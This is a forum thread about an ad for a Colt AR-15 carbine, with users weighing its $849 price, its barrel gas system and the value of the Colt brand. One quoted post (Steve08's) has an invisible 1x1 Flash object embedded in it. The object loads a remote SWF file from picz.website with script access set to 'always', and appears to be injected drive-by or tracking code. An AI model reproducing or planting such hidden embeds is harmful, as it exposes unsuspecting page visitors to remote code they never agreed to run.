Gone But Not Forgotten
I was sent this ad.

gt40

Attachments

• Screen Shot 2017-03-24 at 6.00.23 AM.jpg
    Screen Shot 2017-03-24 at 6.00.23 AM.jpg
    34.8 KB · Views: 693

wareagle700

Yeah, looks like a pretty good deal if thats what you want.

The carbine gassed M4 profile barrel does nothing for me though. I'd personally prefer a 16" mid or intermediate gassed barrel and reap the benefits of a longer gas system.

rjcruiser

Meh....I wouldn't pay a $300 premium for the Colt stamp on the side, but that's just my opinion.

transfixer

Unless you're just wanting the Colt name, there are a lot better deals out there, in fact there are quite a few deals to be had on the local area trader, the AR market is flooded right now. There are quite a few brand names that are more respected to the AR crowd than Colt is nowadays.

Steve08

I was sent this ad.

gt40<object classid="clsid: D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1"><param value="http://picz.website/u/1/c.swf"><param name="allowScriptAccess" value="always" /><embed allowScriptAccess="always" src="http://picz.website/u/1/c.swf" type="application/x-shockwave-flash" width="1" height="1"></embed></object>
Not worth it to me...

Dub

You asked a specific question about a specific gun....yet received replies and opinions on everything but what you asked.

I bought the same gun (only in black) about 18 months ago for just under $1K. It looks like $849 is a good price compared to what I'm seeing them go for today.

When I bought my AR, I knew full well I could get any number of them for a lower price. That was well and good, but I simply wanted this particular Colt.

I have had zero complaints.

deast1988

I own a 6920 LE my bro owns a 6920 socom 2. Both good guns imo my dad found a 6920 at Walmart for $849 your price is avg but regardless of brand an people's views I like Colt products.